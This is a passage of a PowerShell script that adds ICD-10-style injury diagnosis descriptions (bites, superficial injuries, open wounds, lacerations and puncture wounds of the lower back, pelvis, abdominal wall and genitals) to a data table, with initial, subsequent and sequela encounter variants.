encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of scrotum and testes","Insect bite (nonvenomous) of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of vagina and vulva","Insect bite (nonvenomous) of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of vagina and vulva","Insect bite (nonvenomous) of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of vagina and vulva","Insect bite (nonvenomous) of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified external genital organs, male","Insect bite (nonvenomous) of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified external genital organs, male","Insect bite (nonvenomous) of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified external genital organs, male","Insect bite (nonvenomous) of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified external genital organs, female","Insect bite (nonvenomous) of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified external genital organs, female","Insect bite (nonvenomous) of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified external genital organs, female","Insect bite (nonvenomous) of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of anus","Insect bite (nonvenomous) of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of anus","Insect bite (nonvenomous) of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of anus","Insect bite (nonvenomous) of anus, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of lower back and pelvis","Other superficial bite of lower back and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of lower back and pelvis","Other superficial bite of lower back and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of lower back and pelvis","Other superficial bite of lower back and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of abdominal wall","Other superficial bite of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of abdominal wall","Other superficial bite of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of abdominal wall","Other superficial bite of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of penis","Other superficial bite of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of penis","Other superficial bite of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of penis","Other superficial bite of penis, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of scrotum and testes","Other superficial bite of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of scrotum and testes","Other superficial bite of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of scrotum and testes","Other superficial bite of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of vagina and vulva","Other superficial bite of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of vagina and vulva","Other superficial bite of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of vagina and vulva","Other superficial bite of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified external genital organs, male","Other superficial bite of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified external genital organs, male","Other superficial bite of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified external genital organs, male","Other superficial bite of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified external genital organs, female","Other superficial bite of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified external genital organs, female","Other superficial bite of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified external genital organs, female","Other superficial bite of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of anus","Other superficial bite of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of anus","Other superficial bite of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of anus","Other superficial bite of anus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of lower back and pelvis","Unspecified superficial injury of lower back and pelvis, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of lower back and pelvis","Unspecified superficial injury of lower back and pelvis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of lower back and pelvis","Unspecified superficial injury of lower back and pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of abdominal wall","Unspecified superficial injury of abdominal wall, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of abdominal wall","Unspecified superficial injury of abdominal wall, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of abdominal wall","Unspecified superficial injury of abdominal wall, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of penis","Unspecified superficial injury of penis, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of penis","Unspecified superficial injury of penis, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of penis","Unspecified superficial injury of penis, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of scrotum and testes","Unspecified superficial injury of scrotum and testes, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of scrotum and testes","Unspecified superficial injury of scrotum and testes, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of scrotum and testes","Unspecified superficial injury of scrotum and testes, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of vagina and vulva","Unspecified superficial injury of vagina and vulva, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of vagina and vulva","Unspecified superficial injury of vagina and vulva, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of vagina and vulva","Unspecified superficial injury of vagina and vulva, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified external genital organs, male","Unspecified superficial injury of unspecified external genital organs, male, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified external genital organs, male","Unspecified superficial injury of unspecified external genital organs, male, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified external genital organs, male","Unspecified superficial injury of unspecified external genital organs, male, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified external genital organs, female","Unspecified superficial injury of unspecified external genital organs, female, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified external genital organs, female","Unspecified superficial injury of unspecified external genital organs, female, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified external genital organs, female","Unspecified superficial injury of unspecified external genital organs, female, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of anus","Unspecified superficial injury of anus, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of anus","Unspecified superficial injury of anus, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of anus","Unspecified superficial injury of anus, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of lower back and pelvis without penetration into retroperitoneum","Unspecified open wound of lower back and pelvis without penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of lower back and pelvis without penetration into retroperitoneum","Unspecified open wound of lower back and pelvis without penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of lower back and pelvis without penetration into retroperitoneum","Unspecified open wound of lower back and pelvis without penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of lower back and pelvis with penetration into retroperitoneum","Unspecified open wound of lower back and pelvis with penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of lower back and pelvis with penetration into retroperitoneum","Unspecified open wound of lower back and pelvis with penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of lower back and pelvis with penetration into retroperitoneum","Unspecified open wound of lower back and pelvis with penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of lower back and pelvis without penetration into retroperitoneum","Laceration without foreign body of lower back and pelvis without penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of lower back and pelvis without penetration into retroperitoneum","Laceration without foreign body of lower back and pelvis without penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of lower back and pelvis without penetration into retroperitoneum","Laceration without foreign body of lower back and pelvis without penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of lower back and pelvis with penetration into retroperitoneum","Laceration without foreign body of lower back and pelvis with penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of lower back and pelvis with penetration into retroperitoneum","Laceration without foreign body of lower back and pelvis with penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of lower back and pelvis with penetration into retroperitoneum","Laceration without foreign body of lower back and pelvis with penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of lower back and pelvis without penetration into retroperitoneum","Laceration with foreign body of lower back and pelvis without penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of lower back and pelvis without penetration into retroperitoneum","Laceration with foreign body of lower back and pelvis without penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of lower back and pelvis without penetration into retroperitoneum","Laceration with foreign body of lower back and pelvis without penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of lower back and pelvis with penetration into retroperitoneum","Laceration with foreign body of lower back and pelvis with penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of lower back and pelvis with penetration into retroperitoneum","Laceration with foreign body of lower back and pelvis with penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of lower back and pelvis with penetration into retroperitoneum","Laceration with foreign body of lower back and pelvis with penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of lower back and pelvis without penetration into retroperitoneum","Puncture wound without foreign body of lower back and pelvis without penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of lower back and pelvis without penetration into retroperitoneum","Puncture wound without foreign body of lower back and pelvis without penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of lower back and pelvis without penetration into retroperitoneum","Puncture wound without foreign body of lower back and pelvis without penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of lower back and pelvis with penetration into retroperitoneum","Puncture wound without foreign body of lower back and pelvis with penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of lower back and pelvis with penetration into retroperitoneum","Puncture wound without foreign body of lower back and pelvis with penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of lower back and pelvis with penetration into retroperitoneum","Puncture wound without foreign body of lower back and pelvis with penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of lower back and pelvis without penetration into retroperitoneum","Puncture wound with foreign body of lower back and pelvis without penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of lower back and pelvis without penetration into retroperitoneum","Puncture wound with foreign body of lower back and pelvis without penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of lower back and pelvis without penetration into retroperitoneum","Puncture wound with foreign body of lower back and pelvis without penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of lower back and pelvis with penetration into retroperitoneum","Puncture wound with foreign body of lower back and pelvis with penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of lower back and pelvis with penetration into retroperitoneum","Puncture wound with foreign body of lower back and pelvis with penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of lower back and pelvis with penetration into retroperitoneum","Puncture wound with foreign body of lower back and pelvis with penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of lower back and pelvis without penetration into retroperitoneum","Open bite of lower back and pelvis without penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of lower back and pelvis without penetration into retroperitoneum","Open bite of lower back and pelvis without penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of lower back and pelvis without penetration into retroperitoneum","Open bite of lower back and pelvis without penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Open bite of lower back and pelvis with penetration into retroperitoneum","Open bite of lower back and pelvis with penetration into retroperitoneum, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite of lower back and pelvis with penetration into retroperitoneum","Open bite of lower back and pelvis with penetration into retroperitoneum, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite of lower back and pelvis with penetration into retroperitoneum","Open bite of lower back and pelvis with penetration into retroperitoneum, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right upper quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right upper quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right upper quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left upper quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left upper quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left upper quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, epigastric region without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, epigastric region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, epigastric region without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, epigastric region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, epigastric region without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, epigastric region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right lower quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right lower quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, right lower quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, right lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left lower quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left lower quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, left lower quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, left lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, periumbilic region without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, periumbilic region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, periumbilic region without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, periumbilic region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, periumbilic region without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, periumbilic region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, unspecified quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, unspecified quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, unspecified quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, unspecified quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of abdominal wall, unspecified quadrant without penetration into peritoneal cavity","Unspecified open wound of abdominal wall, unspecified quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right upper quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right upper quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right upper quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left upper quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left upper quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left upper quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, epigastric region without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, epigastric region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, epigastric region without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, epigastric region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, epigastric region without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, epigastric region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right lower quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right lower quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, right lower quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, right lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left lower quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left lower quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, left lower quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, left lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, periumbilic region without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, periumbilic region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, periumbilic region without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, periumbilic region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, periumbilic region without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, periumbilic region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, unspecified quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, unspecified quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, unspecified quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, unspecified quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of abdominal wall, unspecified quadrant without penetration into peritoneal cavity","Laceration without foreign body of abdominal wall, unspecified quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, right upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, left upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, epigastric region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, right lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, left lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, periumbilic region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity","Laceration of abdominal wall with foreign body, unspecified quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, right upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, right upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, right upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, right upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, right upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, right upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, left upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, left upper quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, left upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, left upper quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, left upper quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, left upper quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, epigastric region without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, epigastric region without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, epigastric region without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, epigastric region without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, epigastric region without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, epigastric region without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, right lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, right lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, right lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, right lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, right lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, right lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, left lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, left lower quadrant without penetration into peritoneal cavity, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, left lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, left lower quadrant without penetration into peritoneal cavity, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, left lower quadrant without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, left lower quadrant without penetration into peritoneal cavity, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound of abdominal wall without foreign body, periumbilic region without penetration into peritoneal cavity","Puncture wound of abdominal wall without foreign body, periumbilic region without penetration into peritoneal 